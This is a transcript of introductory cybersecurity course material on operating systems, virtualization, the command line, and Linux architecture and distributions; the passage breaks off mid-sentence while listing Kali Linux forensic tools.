Technical Program Manager in security. I grew up with computers and the internet but didn't really
consider security as a career opportunity until I saw how it was interwoven into technology. Before
my first security job, I worked on a cloud application team and had to regularly interact with the
security team. It was my first experience working with security, but the idea of protecting
information and working with others towards that goal was exciting to me. As a result, I decided to
work towards my CISSP, which led me to some new job opportunities at my company, and I was
then able to move into security. At this point, if you've been following along, you've already
explored a variety of concepts useful to the security field, including security domains and
networking. I'm excited to join you during the next part of the program. We'll take it slow so that
you can understand these topics in practical ways. The focus of this course is computing basics.
When you understand how the machines in an organization's system work, it helps you do your job
as a security analyst more efficiently. Part of your job as a
security analyst is to keep systems protected from possible attacks. You're one of the first levels of
defense in protecting an organization's data. To do this effectively, it's helpful to understand how
the system you're protecting works. In addition, you may need to investigate events to help correct
errors in the system. Being familiar with Linux operating system and its associated commands, and
also being able to interact with an organization's data through SQL, will help you with that. In this
course you'll learn about operating systems and how they relate to applications and hardware.
Next, you'll explore the Linux operating system in more detail. Then you'll use the Linux command
line within a security context. Finally, we'll discuss how you can use SQL to query databases while
working as a security analyst. I'm excited to explore all of these topics with you.
Course 4 overview
Hello, and welcome to Tools of the Trade: Linux and SQL, the fourth course in the Google Cybersecurity
Certificate. You're on an exciting journey!
By the end of this course, you will develop a greater understanding of the basics of computing that will
support your work as a security analyst. You will learn foundational concepts related to understanding
operating systems, communicating with the Linux operating system through commands, and querying
databases with Structured Query Language (SQL). These are key concepts in the cybersecurity field and
understanding them will help you keep organizations secure.
Certificate program progress
The Google Cybersecurity Certificate program has eight courses. Tools of the Trade: Linux and SQL is the
fourth course.
1. Foundations of Cybersecurity — Explore the cybersecurity profession, including significant
events that led to the development of the cybersecurity field and its continued importance to
organizational operations. Learn about entry-level cybersecurity roles and responsibilities.
2. Play It Safe: Manage Security Risks — Identify how cybersecurity professionals use frameworks
and controls to protect business operations, and explore common cybersecurity tools.
3. Connect and Protect: Networks and Network Security — Gain an understanding of network-level
vulnerabilities and how to secure networks.
4. Tools of the Trade: Linux and SQL — (current course) Explore foundational computing skills,
including communicating with the Linux operating system through the command line and
querying databases with SQL.
Course 4 content
Each course of this certificate program is broken into modules. You can complete courses at your own
pace, but the module breakdowns are designed to help you finish the entire Google Cybersecurity
Certificate in about six months.
Module 1: Introduction to operating systems
You will learn about the relationship between operating systems, hardware, and software, and become
familiar with the primary functions of an operating system. You'll recognize common operating systems
in use today and understand how the graphical user interface (GUI) and command-line interface (CLI)
both allow users to interact with the operating system.
Module 2: The Linux operating system
You will be introduced to the Linux operating system and learn how it is commonly used in
cybersecurity. You’ll also learn about Linux architecture and common Linux distributions. In addition,
you'll be introduced to the Linux shell and learn how it allows you to communicate with the operating
system.
Module 3: Linux commands in the Bash shell
You will be introduced to Linux commands as entered through the Bash shell. You'll use the Bash shell to
navigate and manage the file system and to authorize and authenticate users. You'll also learn where to
go for help when working with new Linux commands.
Module 4: Databases and SQL
You will practice using SQL to communicate with databases. You'll learn how to query a database and
filter the results. You’ll also learn how SQL can join multiple tables together in a query.
Module 1: Introduction to operating systems
You will learn about the relationship between operating systems, hardware, and software, and become
familiar with the primary functions of an operating system. You'll recognize common operating systems
in use today and understand how the graphical user interface (GUI) and command-line interface (CLI)
both allow users to interact with the operating system.
Devices like computers, smartphones, and tablets all have operating systems. If you've used a desktop or
laptop computer, you may have used the Windows or MacOs operating systems. Smartphones and
tablets run on mobile operating systems like Android and iOS. Another popular operating system is
Linux. Linux is used in the security industry, and as a security professional, it's likely that you'll interact
with the Linux OS. So what exactly is an operating system? It's the interface between the computer
hardware and the user. The operating system, or the OS as it's
commonly called, is responsible for making the computer run as efficiently as possible while also making
it easy to use. Hardware may be another new term. Hardware refers to the physical components of a
computer. The OS interface that we now rely on every day is something that early computers didn't
have. In the 1950s the biggest challenge with early computers was the amount of time it took to run a
computer program. At the time, computers could not run multiple programs simultaneously. Instead,
people had to wait for a program to finish running, reset the computer, and load up the new program.
Imagine having to turn your computer on and off each time you had to open a new application! It would
take a long time to complete a simple task like sending an email. Since then, operating systems have
evolved, and we no longer have to worry about wasting time in this way. Thanks to operating systems
and their evolution, today's computers run efficiently. They run multiple applications at once, and they
also access external devices like printers, keyboards, and mice. Another reason why operating systems
are important is that they help humans and computers communicate with each other. Computers
communicate in a language called binary, which consists of 0s and 1s. The OS provides an interface to
bridge this communication gap between the user and the computer, allowing you to interact with the
computer in complex ways. Operating systems are critical for the use of computers. Likewise, OS
security is also critical for the security of a computer. This involves securing files, data access, and user
authentication to help protect and prevent against threats such as viruses, worms, and malware.
Knowing how operating systems work is essential for completing different security related tasks. For
example, as a security analyst, you may be responsible for configuring and maintaining the security of a
system by managing access. You may also be responsible for managing and configuring firewalls, setting
security policies, enabling virus protection, and performing auditing, accounting, and logging to detect
unusual behavior.
Compare operating systems
You previously explored why operating systems are an important part of how a computer works. In this
reading, you’ll compare some popular operating systems used today. You’ll also focus on the risks of
using legacy operating systems.
Common operating systems
The following operating systems are useful to know in the security industry: Windows, macOS®, Linux,
ChromeOS, Android, and iOS.
Windows and macOS
Windows and macOS are both common operating systems. The Windows operating system was
introduced in 1985, and macOS was introduced in 1984. Both operating systems are used in personal
and enterprise computers.
Windows is a closed-source operating system, which means the source code is not shared freely with the
public. macOS is partially open source. It has some open-source components, such as macOS’s kernel.
macOS also has some closed-source components.
Linux
The first version of Linux was released in 1991, and other major releases followed in the early 1990s.
Linux is a completely open-source operating system, which means that anyone can access Linux and its
source code. The open-source nature of Linux allows developers in the Linux community to collaborate.
Linux is particularly important to the security industry. There are some distributions that are
specifically designed for security. Later in this course, you’ll learn about Linux and its importance to the
security industry.
ChromeOS
ChromeOS launched in 2011. It’s partially open source and is derived from Chromium OS, which is
completely open source. ChromeOS is frequently used in the education field.
Android and iOS
Android and iOS are both mobile operating systems. Unlike the other operating systems mentioned,
mobile operating systems are typically used in mobile devices, such as phones, tablets, and watches.
Android was introduced for public use in 2008, and iOS was introduced in 2007. Android is open source,
and iOS is partially open source.
Operating systems and vulnerabilities
Security issues are inevitable with all operating systems. An important part of protecting an operating
system is keeping the system and all of its components up to date.
Legacy operating systems
A legacy operating system is an operating system that is outdated but still being used. Some
organizations continue to use legacy operating systems because software they rely on is not compatible
with newer operating systems. This can be more common in industries that use a lot of equipment that
requires embedded software—software that’s placed inside components of the equipment.
Legacy operating systems can be vulnerable to security issues because they’re no longer supported or
updated. This means that legacy operating systems might be vulnerable to new threats.
Other vulnerabilities
Even when operating systems are kept up to date, they can still become vulnerable to attack. Below are
several resources that include information on operating systems and their vulnerabilities.
●
●
●
●
Microsoft Security Response Center (MSRC): A list of known vulnerabilities affecting Microsoft
products and services
Apple Security Updates: A list of security updates and information for Apple® operating
systems, including macOS and iOS, and other products
Common Vulnerabilities and Exposures (CVE) Report for Ubuntu: A list of known vulnerabilities
affecting Ubuntu, which is a specific distribution of Linux
Google Cloud Security Bulletin: A list of known vulnerabilities affecting Google Cloud products
and services
Keeping an operating system up to date is one key way to help the system stay secure. Because it can be
difficult to keep all systems updated at all times, it’s important for security analysts to be knowledgeable
about legacy operating systems and the risks they can create.
Key takeaways
Windows, macOS, Linux, ChromeOS, Android, and iOS are all commonly used operating systems.
Security analysts should be aware of vulnerabilities that affect operating systems. It’s especially
important for security analysts to be familiar with legacy operating systems, which are systems that are
outdated but still being used.
Inside the operating system
Previously, you learned about what operating systems are. Now, let's discuss how they work. In this
video, you'll learn what happens with an operating system, or OS, when someone uses a computer for a
task. Think about when someone drives a car. They push the gas pedal and the car moves forward. They
don't need to pay attention to all the mechanics that allow the car to move. Just like a car can't work
without its engine, a computer can't work without its operating system. The job of an OS is to help other
computer programs run efficiently. The OS does this by taking care of all the messy details related to
controlling, the computer's hardware, so you don't have to. First, let's see what happens when you turn
on the computer. When you press the power button, you're interacting with the hardware. This boots
the computer and brings up the operating system. Booting the computer means that a special microchip
called a BIOS is activated. On many computers built after 2007, the chip was replaced by the UEFI. Both
BIOS and UEFI contain booting instructions that are responsible for loading a special program called the
bootloader. Then, the bootloader is responsible for starting the operating system. Just like that, your
computer is on. As a security analyst, understanding these processes can be helpful for you.
Vulnerabilities can occur in something like a booting process. Often, the BIOS is not scanned by the
antivirus software, so it can be vulnerable to malware infection. Now, that you learned how to boot the
operating system, let's look at how you and all users communicate with the system to complete a task.
The process starts
with you, the user. And to complete tasks, you use applications on your computer. An application is a
program that performs a specific task. When you do this, the application sends your request to
the operating system. From there, the operating system interprets this request and directs it to the
appropriate component of the computer's hardware. In the previous video, we learned that the
hardware consists of all the physical components of the computer. The hardware will also send
information back to the operating system. And this in turn is sent back to the application. Let's give a
simple overview of how this works when you want to use the calculator on your computer. You use your
mouse to click on the calculator application on your computer. When you type in the number you want
to calculate, the application communicates with the operating system. Your operating system then sends
a calculation to a component of the hardware, the central processing unit, or CPU. Once the hardware
does the work of determining the final number, it sends the answer back to your operating system.
Then, it can be displayed in your calculator application. Understanding this process is helpful when
investigating security events. Security analysts should be able to trace back through this process flow to
analyze where a security event could have occurred. Just like a mechanic needs to understand the inner
workings of a car more than an average driver, recognizing how operating systems work is important
knowledge for a security analyst.
Requests to the operating system
Operating systems are a critical component of a computer. They make connections between applications
and hardware to allow users to perform tasks. In this reading, you’ll explore this complex process
further and consider it using a new analogy and a new example.
Booting the computer
When you boot, or turn on, your computer, either a BIOS or UEFI microchip is activated. The Basic
Input/Output System (BIOS) is a microchip that contains loading instructions for the computer and is
prevalent in older systems. The Unified Extensible Firmware Interface (UEFI) is a microchip that
contains loading instructions for the computer and replaces BIOS on more modern systems.
The BIOS and UEFI chips both perform the same function for booting the computer. BIOS was the
standard chip until 2007, when UEFI chips increased in use. Now, most new computers include a UEFI
chip. UEFI provides enhanced security features.
The BIOS or UEFI microchips contain a variety of loading instructions for the computer to follow. For
example, one of the loading instructions is to verify the health of the computer’s hardware.
The last instruction from the BIOS or UEFI activates the bootloader. The bootloader is a software
program that boots the operating system. Once the operating system has finished booting, your
computer is ready for use.
Completing a task
As previously discussed, operating systems help us use computers more efficiently. Once a computer has
gone through the booting process, completing a task on a computer is a four-part process.
User
The first part of the process is the user. The user initiates the process by having something they want to
accomplish on the computer. Right now, you’re a user! You’ve initiated the process of accessing this
reading.
Application
The application is the software program that users interact with to complete a task. For example, if you
want to calculate something, you would use the calculator application. If you want to write a report, you
would use a word processing application. This is the second part of the process.
Operating system
The operating system receives the user’s request from the application. It’s the operating system’s job to
interpret the request and direct its flow. In order to complete the task, the operating system sends it on
to applicable components of the hardware.
Hardware
The hardware is where all the processing is done to complete the tasks initiated by the user. For
example, when a user wants to calculate a number, the CPU figures out the answer. As another example,
when a user wants to save a file, another component of the hardware, the hard drive, handles this task.
After the work is done by the hardware, it sends the output back through the operating system to the
application so that it can display the results to the user.
The OS at work behind the scenes
Consider once again how a computer is similar to a car. There are processes that someone won’t directly
observe when operating a car, but they do feel it move forward when they press the gas pedal. It’s the
same with a computer. Important work happens inside a computer that you don’t experience directly.
This work involves the operating system.
You can explore this through another analogy. The process of using an operating system is also similar
to ordering at a restaurant. At a restaurant you place an order and get your food, but you don’t see
what’s happening in the kitchen when the cooks prepare the food.
Ordering food is similar to using an application on a computer. When you order your food, you make a
specific request like “a small soup, very hot.” When you use an application, you also make specific
requests like “print three double-sided copies of this document.”
You can compare the food you receive to what happens when the hardware sends output. You receive
the food that you ordered. You receive the document that you wanted to print.
Finally, the kitchen is like the OS. You don’t know what happens in the kitchen, but it’s critical in
interpreting the request and ensuring you receive what you ordered. Similarly, though the work of the
OS is not directly transparent to you, it’s critical in completing your tasks.
An example: Downloading a file from an internet browser
Previously, you explored how operating systems, applications, and hardware work together
by examining a task involving a calculation. You can expand this understanding by exploring how the OS
completes another task, downloading a file from an internet browser:
●
●
●
First, the user decides they want to download a file that they found online, so they click on a
download button near the file in the internet browser application.
Then, the internet browser communicates this action to the OS.
The OS sends the request to download the file to the appropriate hardware for processing.
●
The hardware begins downloading the file, and the OS sends this information to the internet
browser application. The internet browser then informs the user when the file has been
downloaded.
Key takeaways
Although it operates in the background, the operating system is an essential part of the process of using
a computer. The operating system connects applications and hardware to allow users to complete a task.
Now we're ready to discuss a different aspect of your operating system. Not only does the OS interact
with other parts of your computer, but it's also responsible for managing the resources
of the system. This is a big task that requires a lot of balance to make sure all the resources of the
computer are used efficiently. Think of this like the concept of energy. A person needs energy to
complete different tasks. Some tasks need more energy, while others require less. For example, going for
a run requires more energy than watching TV. A computer's OS also needs to make sure that it has
enough energy to function correctly for certain tasks. Running an antivirus scan on your computer will
use more energy than using the calculator application. Imagine your computer is an orchestra. Many
different instruments like violins, drums, and trumpets are all part of the orchestra. An orchestra also
has a conductor to direct the flow of the music. In a computer, the OS is the conductor. The OS handles
resource and memory management to ensure the limited capacity of the computer system is used where
it's needed most. A variety of programs, tasks, and processes are constantly competing for the resources
of the central processing unit, or CPU. They all have their own reasons why they need memory, storage,
and input/output bandwidth. The OS is responsible
for ensuring that each program is allocating and de-allocating resources. All this occurs in
your computer at the same time so that your system functions efficiently. Much of this is hidden
from you as a user. But, your task manager will list all of the tasks that are being processed, along with
their memory and CPU usage. As an analyst, it's helpful to know where a system's resources are used.
Understanding usage of resources can help you respond to an incident and troubleshoot applications in
the system. For example, if a computer is running slowly, an analyst might discover it's allocating
resources to malware. A basic understanding of how operating systems work will help you better
understand the security skills you will learn later in this program.
Virtualization technology
You've explored a lot about operating systems. One more aspect to consider is that operating systems
can run on virtual machines. In this reading, you’ll learn about virtual machines and the general concept
of virtualization. You’ll explore how virtual machines work and the benefits of using them.
What is a virtual machine?
A virtual machine (VM) is a virtual version of a physical computer. Virtual machines are one example of
virtualization. Virtualization is the process of using software to create virtual representations of various
physical machines. The term “virtual” refers to machines that don’t exist physically, but operate like they
do because their software simulates physical hardware. Virtual systems don’t use dedicated physical
hardware. Instead, they use software-defined versions of the physical hardware. This means that a
single virtual machine has a virtual CPU, virtual storage, and other virtual hardware. Virtual systems are
just code.
You can run multiple virtual machines using the physical hardware of a single computer. This involves
dividing the resources of the host computer to be shared across all physical and virtual components. For
example, Random Access Memory (RAM) is a hardware component used for short-term memory. If a
computer has 16GB of RAM, it can host three virtual machines so that the physical computer and virtual
machines each have 4GB of RAM. Also, each of these virtual machines would have their own operating
system and function similarly to a typical computer.
Benefits of virtual machines
Security professionals commonly use virtualization and virtual machines. Virtualization can increase
security for many tasks and can also increase efficiency.
Security
One benefit is that virtualization can provide an isolated environment, or a sandbox, on the physical host
machine. When a computer has multiple virtual machines, these virtual machines are “guests” of the
computer. Specifically, they are isolated from the host computer and other guest virtual machines. This
provides a layer of security, because virtual machines can be kept separate from the other systems. For
example, if an individual virtual machine becomes infected with malware, it can be dealt with more
securely because it’s isolated from the other machines. A security professional could also intentionally
place malware on a virtual machine to examine it in a more secure environment.
Note: Although using virtual machines is useful when investigating potentially infected machines or
running malware in a constrained environment, there are still some risks. For example, a malicious
program can escape virtualization and access the host machine. This is why you should never
completely trust virtualized systems.
Efficiency
Using virtual machines can also be an efficient and convenient way to perform security tasks. You can
open multiple virtual machines at once and switch easily between them. This allows you to streamline
security tasks, such as testing and exploring various applications.
You can compare the efficiency of a virtual machine to a city bus. A single city bus has a lot of room and
is an efficient way to transport many people simultaneously. If city buses didn’t exist, then everyone on
the bus would have to drive their own cars. This uses more gas, cars, and other resources than riding the
city bus.
Similar to how many people can ride one bus, many virtual machines can be hosted on the same physical
machine. That way, separate physical machines aren't needed to perform certain tasks.
Managing virtual machines
Virtual machines can be managed with a software called a hypervisor. Hypervisors help users manage
multiple virtual machines and connect the virtual and physical hardware. Hypervisors also help with
allocating the shared resources of the physical host machine to one or more virtual machines.
One hypervisor that is useful for you to be familiar with is the Kernel-based Virtual Machine (KVM). KVM
is an open-source hypervisor that is supported by most major Linux distributions. It is built into the Linux
kernel, which means it can be used to create virtual machines on any machine running a Linux operating
system without the need for additional software.
Other forms of virtualization
In addition to virtual machines, there are other forms of virtualization. Some of these virtualization
technologies do not use operating systems. For example, multiple virtual servers can be created from a
single physical server. Virtual networks can also be created to more efficiently use the hardware of a
physical network.
Key takeaways
Virtual machines are virtual versions of physical computers and are one example of virtualization.
Virtualization is a key technology in the security industry, and it’s important for security analysts to
understand the basics. There are many benefits to using virtual machines, such as isolation of malware
and other security risks. However, it’s important to remember there’s still a risk of malicious software
escaping their virtualized environments.
Now that you've learned the inner workings of computers, let's discuss how users and operating
systems communicate with each other. So far, you've learned that a computer has an operating system,
hardware, and applications. Remember, the operating system communicates with the hardware to
execute tasks. In this video, you'll learn how the user—that's you—interacts with the operating system
in order to send tasks to the hardware. The user communicates with the operating system via an
interface. A user interface is a program that allows a user to control the functions
of the operating system. Two user interfaces that we'll discuss are the graphical user interface, or GUI, and
the command-line interface, or CLI. Let's cover these interfaces in more detail. A GUI is a user interface
that uses icons on the screen to manage different tasks on the computer. Most operating systems can be
used with a graphical user interface. If you've used a personal
computer or a cell phone, you have experienced operating a GUI. Most GUIs include these components: a
start menu with program groups, a task bar for launching programs, and a desktop with icons and
shortcuts. All these components help you communicate with the OS to execute tasks. In addition to
clicking on icons, when you use a GUI, you can also search for files or applications from the start menu.
You just have to remember the icon or name of the program to activate an application. Now let's discuss
the command-line interface. In comparison, the comma d-line interface, or CLI, is a text-based user
interface that uses commands to interact with the computer. These commands communicate with the
operating system and execute tasks like opening programs. The command-line interface is a much
different structure than the graphical user interface. When you use the CLI, you'll immediately notice a
difference. There are no icons or
graphics on the screen. The command-line interface looks like lines of code using certain text languages.
A CLI is more flexible and more powerful than a GUI. Think about using a CLI like creating whatever
meal you'd like from ingredients bought at a grocery store. This gives you a lot of control and
customization about what you're going to eat. In comparison, using a GUI is more like ordering food
from a restaurant. You can only order what's on the menu. If you want both a noodle dish and pizza, but
the first restaurant you go to only has pizza, you'll have to go to another restaurant to order the noodles.
With a graphical user interface, you must do one task at a time. But the command-line interface allows
for customization, which lets you complete multiple tasks simultaneously. For example, imagine you
have a folder with hundreds of files of different file types,
and you need to move only the JPEG files to a new folder. Think about how slow and tedious this would
be as you use a GUI to find each JPEG file in this folder and move it into the new one. On the other hand,
the CLI would allow you to streamline this process and move them all at once. As you can see, there are
very big differences in these two types of user interfaces. As a security analyst, some of your work may
involve the command-line interface. When analyzing logs or authenticating and authorizing users,
security analysts commonly use a CLI in their everyday work. In this video, we discussed two types of
user interfaces. You learned that you already have experience using a
graphical user interface, as most personal computers and cell phones use a GUI. You were introduced to
the command-line interface.
The command line in use
Previously, you explored graphical user interfaces (GUI) and command-line user interfaces (CLI). In this
reading, you’ll compare these two interfaces and learn more about how they’re used in cybersecurity.
CLI vs. GUI
A graphical user interface (GUI) is a user interface that uses icons on the screen to manage different
tasks on the computer. A command-line interface (CLI) is a text-based user interface that uses
commands to interact with the computer.
Display
One notable difference between these two interfaces is how they appear on the screen. A GUI has
graphics and icons, such as the icons on your desktop or taskbar for launching programs. In contrast, a
CLI only has text. It looks similar to lines of code.
Function
These two interfaces also differ in how they function. A GUI is an interface that only allows you to make
one request at a time. However, a CLI allows you to make multiple requests at a time.
Advantages of a CLI in cybersecurity
The choice between using a GUI or CLI is partly based on personal preference, but security analysts
should be able to use both interfaces. Using a CLI can provide certain advantages.
Efficiency
Some prefer the CLI because it can be used more quickly when you know how to manage this interface.
For a new user, a GUI might be more efficient because they’re easier for beginners to navigate.
Because a CLI can accept multiple requests at one time, it’s more powerful when you need to perform
multiple tasks efficiently. For example, if you had to create multiple new files in your system, you could
quickly perform this task in a CLI. If you were using a GUI, this could take much longer, because you have
to repeat the same steps for each new file.
History file
For security analysts, using the Linux CLI is helpful because it records a history file of all the commands
and actions in the CLI. If you were using a GUI, your actions are not necessarily saved in a history file.
For example, you might be in a situation where you’re responding to an incident using a playbook. The
playbook’s instructions require you to run a series of different commands. If you used a CLI, you’d be
able to go back to the history and ensure all of the commands were correctly used. This could be helpful
if there were issues using the playbook and you had to review the steps you performed in the command
line.
Additionally, if you suspect an attacker has compromised your system, you might be able to trace their
actions using the history file.
Key takeaways
GUIs and CLIs are two types of user interfaces that security analysts should be familiar with. There are
multiple differences between a GUI and a CLI, including their displays and how they function. When
working in cybersecurity, a CLI is often preferred over a GUI because it can handle multiple tasks
simultaneously and it includes a history file.
Glossary terms from module 1
Terms and definitions from Course 4, Module 1
Application: A program that performs a specific task
Basic Input/Output System (BIOS): A microchip that contains loading instructions for the computer and
is prevalent in older systems
Bootloader: A software program that boots the operating system
Command-line interface (CLI): A text-based user interface that uses commands to interact with the
computer
Graphical user interface (GUI): A user interface that uses icons on the screen to manage different tasks
on the computer
Hardware: The physical components of a computer
Legacy operating system: An operating system that is outdated but still being used
Operating system (OS): The interface between computer hardware and the user
Random Access Memory (RAM): A hardware component used for short-term memory
Unified Extensible Firmware Interface (UEFI): A microchip that contains loading instructions for the
computer and replaces BIOS on more modern systems
User interface: A program that allows the user to control the functions of the operating system
Virtual machine (VM): A virtual version of a physical computer
Introduction to Linux
You might have seen or heard the name Linux in the past. But did you know Linux is the most-used
operating system in security today? Let's start by taking a look at Linux and
how it's used in security. Linux is an open-source operating system. It was created in two parts. In
the early 1990s, two different people were working separately on projects to improve computer
engineering. The first person was Linus Torvalds. At the time, the UNIX operating
system was already in use. He wanted to improve it and make it open source and accessible to
anyone. What was revolutionary was his introduction of the Linux kernel. We're going to learn what
the kernel does later. Around the same time, Richard Stallman started working on GNU. GNU was
also an operating system based on UNIX. Stallman shared Torvalds' goal of
creating software that was free and open to anyone. After working on GNU for
a few years, the missing element for the software was a kernel. Together, Torvalds' and Stallman’s
innovations made what is commonly referred to as Linux. Now that you've learned
the history behind Linux, let's take a look at
what makes Linux unique. As mentioned before, Linux is open source, meaning anyone can have
access to the operating system and the source code. Linux and many of the programs that come
with Linux are licensed under the terms of the GNU Public License, which allow you
to use, share, and modify them freely. Thanks to Linux's open-source philosophy as well as a strong
feature set, an entire community of developers has adopted this operating system. These
developers can collaborate on projects and advance computing together. As a security analyst,
you'll discover that Linux is used at different organizations. More specifically, Linux is used in many
security programs. Another unique feature about Linux is the different distributions, or varieties,
that have been developed. Because of the large community contribution, there are over 600
distributions of Linux. Later you'll learn more about distributions. Finally, let's look at how you
would use Linux in an entry-level security position. As a security analyst, you'll use many tools and
programs in everyday work. You might examine different types of logs to identify what's going on in
the system. For example, you might find yourself looking at an error log when investigating an
issue. Another place where you will use Linux is to verify access and authorization in an identity
and access management system. In security, managing access is key to ensure a secure system.
We'll take a closer look into access and authorization later. Finally, as an analyst, you might find
yourself working with specific distributions designed for a particular task. For example, you might
use a distribution that has a digital forensic tool to investigate what happened in an event alert. You
might also use a distribution that's for pen testing in offensive security to look for vulnerabilities in
the system. Distributions are created to fit the needs of their users.
Linux Architecture
Let me start with a quick question that may seem unrelated to security. Do you have a favorite
building? And what is it about its architecture that
impresses you the most? The windows? The structure of the walls? Just like buildings,
operating systems also have an architecture and are made up of discrete components that work
together to form the whole. In this video, we're going to look at all the components that
together make up Linux. The components of Linux include the user, applications, the shell, the
Filesystem Hierarchy Standard, the kernel, and the hardware. Don't worry—we'll go into these
components one by one together. First, you are the user. The user is the person
interacting with the computer. In Linux, you're the first element to the architecture of
the operating system. You're initiating the tasks or commands that the OS
is going to execute. Linux is a multi-user system. This means that more
than one user can use the system's resources at the same time. The second element
of the architecture is the applications within a system. An application is a program that performs a
specific task, such as a word processor or a calculator. You might hear the
word "applications" and "programs" used interchangeably. As an example, one popular Linux
application that we'll learn more about later is Nano. Nano is a text editor. This simple application
helps you keep notes on the screen. Linux applications are commonly distributed through package
managers. We'll learn more about this process later. The next component
in the architecture of Linux is the shell. This is an important element because it is how you will
communicate with the system. The shell is a command line interpreter. It processes commands and
outputs the results. This might sound familiar. Previously, we learned about the two types of user
interfaces: the GUI and the CLI. You can think of the shell as a CLI. Another element of the
architecture of Linux is the Filesystem Hierarchy Standard, or FHS. It's the component of the Linux
OS that organizes data. An easy way for you to think about the FHS is to think about it as a filing
cabinet of data. The FHS is how data is stored in a
system. It's a way to organize data so that it can be found when the data is accessed by the system.
That brings us to the kernel. The kernel is a component of the Linux OS that manages processes and
memory. The kernel communicates with the hardware to execute the commands sent by the shell.
The kernel uses drivers to enable applications to execute tasks. The Linux kernel helps ensure that
the system allocates resources more efficiently and makes the system work faster. Finally, the last
component of the architecture is the hardware. Hardware refers to the physical components of a
computer. You can compare this to software applications which can be downloaded into a system.
The hardware in your computer are things like the CPU, mouse, and keyboard.
Linux architecture explained
Understanding the Linux architecture is important for a security analyst. When you understand how a
system is organized, it makes it easier to understand how it functions. In this reading, you’ll learn more
about the individual components in the Linux architecture. A request to complete a task starts with the
user and then flows through applications, the shell, the Filesystem Hierarchy Standard, the kernel, and
the hardware.
User
The user is the person interacting with a computer. They initiate and manage computer tasks. Linux is a
multi-user system, which means that multiple users can use the same resources at the same time.
Applications
An application is a program that performs a specific task. There are many different applications on your
computer. Some applications typically come pre-installed on your computer, such as calculators or
calendars. Other applications might have to be installed, such as some web browsers or email clients. In
Linux, you'll often use a package manager to install applications. A package manager is a tool that helps
users install, manage, and remove packages or applications. A package is a piece of software that can be
combined with other packages to form an application.
Shell
The shell is the command-line interpreter. Everything entered into the shell is text based. The shell
allows users to give commands to the kernel and receive responses from it. You can think of the shell as
a translator between you and your computer. The shell translates the commands you enter so that the
computer can perform the tasks you want.
Filesystem Hierarchy Standard (FHS)
The Filesystem Hierarchy Standard (FHS) is the component of the Linux OS that organizes data. It
specifies the location where data is stored in the operating system.
A directory is a file that organizes where other files are stored. Directories are sometimes called
“folders,” and they can contain files or other directories. The FHS defines how directories, directory
contents, and other storage is organized so the operating system knows where to find specific data.
Kernel
The kernel is the component of the Linux OS that manages processes and memory. It communicates with
the applications to route commands. The Linux kernel is unique to the Linux OS and is critical for
allocating resources in the system. The kernel controls all major functions of the hardware, which can
help get tasks expedited more efficiently.
Hardware
The hardware is the physical components of a computer. You might be familiar with some hardware
components, such as hard drives or CPUs. Hardware is categorized as either peripheral or internal.
Peripheral devices
Peripheral devices are hardware components that are attached and controlled by the computer system.
They are not core components needed to run the computer system. Peripheral devices can be added or
removed freely. Examples of peripheral devices include monitors, printers, the keyboard, and the
mouse.
Internal hardware
Internal hardware are the components required to run the computer. Internal hardware includes a main
circuit board and all components attached to it. This main circuit board is also called the motherboard.
Internal hardware includes the following:
●
●
●
The Central Processing Unit (CPU) is a computer’s main processor, which is used to perform
general computing tasks on a computer. The CPU executes the instructions provided by
programs, which enables these programs to run.
Random Access Memory (RAM) is a hardware component used for short-term memory. It’s
where data is stored temporarily as you perform tasks on your computer. For example, if you’re
writing a report on your computer, the data needed for this is stored in RAM. After you’ve
finished writing the report and closed down that program, this data is deleted from RAM.
Information in RAM cannot be accessed once the computer has been turned off. The CPU takes
the data from RAM to run programs.
The hard drive is a hardware component used for long-term memory. It’s where programs and
files are stored for the computer to access later. Information on the hard drive can be accessed
even after a computer has been turned off and on again. A computer can have multiple hard
drives.
Key takeaways
It’s important for security analysts to understand the Linux architecture and how these components are
organized. The components of the Linux architecture are the user, applications, shell, Filesystem
Hierarchy Standard, kernel, and hardware. Each of these components is important in how Linux
functions.
Let's learn a little bit more about Linux and what you need to know about this operating system when
working as a security analyst. Linux is a very customizable operating system. Unlike other operating
systems, there are different versions available for you to use. These different versions of Linux are called
distributions. You might also hear them called distros or flavors of Linux. It's essential for you to
understand the distribution that you're using so you know what tools and apps are available to you. For
example, Debian is a distro that has different tools than the Ubuntu distribution. Let's use an analogy to
describe Linux distributions. Think of the OS as a vehicle. First, we'll start with its engine—that would be
the kernel. Just as the engine makes a vehicle run, the kernel is the most important component of the
Linux OS. Because the Linux kernel is open source, anyone can take the kernel and modify it to build a
new distribution. This is comparable to a vehicle manufacturer taking an engine and creating different
types of vehicles: trucks, cars, vans, convertibles, busses, airplanes, and so on. These different types of
vehicles can be compared to different Linux distributions. A bus is used to transport lots of people. A
truck is used to transport many goods across vast distances. An aircraft transports passengers or goods
by air. Just as each vehicle serves its own purpose, different distributions are used for different reasons.
Additionally, vehicles all have different components which distinguish them from each other. Aircrafts
have control panels with buttons and knobs. Regular cars have four tires, but trucks can have more.
Similarly, different Linux distributions contain different preinstalled programs, user interfaces, and
much more. A lot of this is based on what the Linux user needs, but some distros are also chosen based
on preference—the same way a sports car might be chosen as a vehicle. The advantage of using Linux as
an OS is that you can customize it. Distributions include the Linux kernel, utilities, a package management
system, and an installer. We learned earlier that Linux is open source, and anyone can contribute to
adding to the source code. That is how new distributions are created. All distros are derived from
another distro, but there are a few that are considered parent distributions. Red Hat® is the parent of
CentOS, and Slackware® is the parent of SUSE®. Both Ubuntu and KALI LINUX™ are derived from Debian.
KALI LINUX
KALI LINUX™ is a trademark of Offensive Security and is Debian derived. This open-source distro
was made specifically with penetration testing and digital forensics in mind. There are many tools
pre-installed into KALI LINUX™. It's important to note that KALI LINUX™ should be used on a virtual
machine. This prevents damage to your system in the event its tools are used improperly. An
additional benefit is that using a virtual machine gives you the ability to revert to a previous state.
As security professionals advance in their careers, some specialize in penetration testing. A
penetration test is a simulated attack that helps identify vulnerabilities in systems, networks,
websites, applications, and processes. KALI LINUX™ has numerous tools that are useful during
penetration testing. Let's look at a few examples. To begin, Metasploit can be used to look for and
exploit vulnerabilities on machines. Burp Suite is another tool that helps to test for weaknesses in
web applications. And finally, John the Ripper is a tool used to guess passwords. As a security
analyst, your work might involve digital forensics. Digital forensics is the process of collecting and
analyzing data to determine what has happened after an attack. For example, you might take an
investigative look at data related to network activity. KALI LINUX™ is also a useful distribution for
security professionals who are involved in digital forensic work. It has a large number of tools that
can be used for this. As one example, tcpdump is a command-line packet analyzer. It's used to
capture network traffic. Another tool commonly used in the security profession is Wireshark. It has
a graphical user interface that can be used to analyze live and captured network traffic. And as a final
example, Autopsy is a forensic tool used to analyze hard drives and smartphones. These are just a
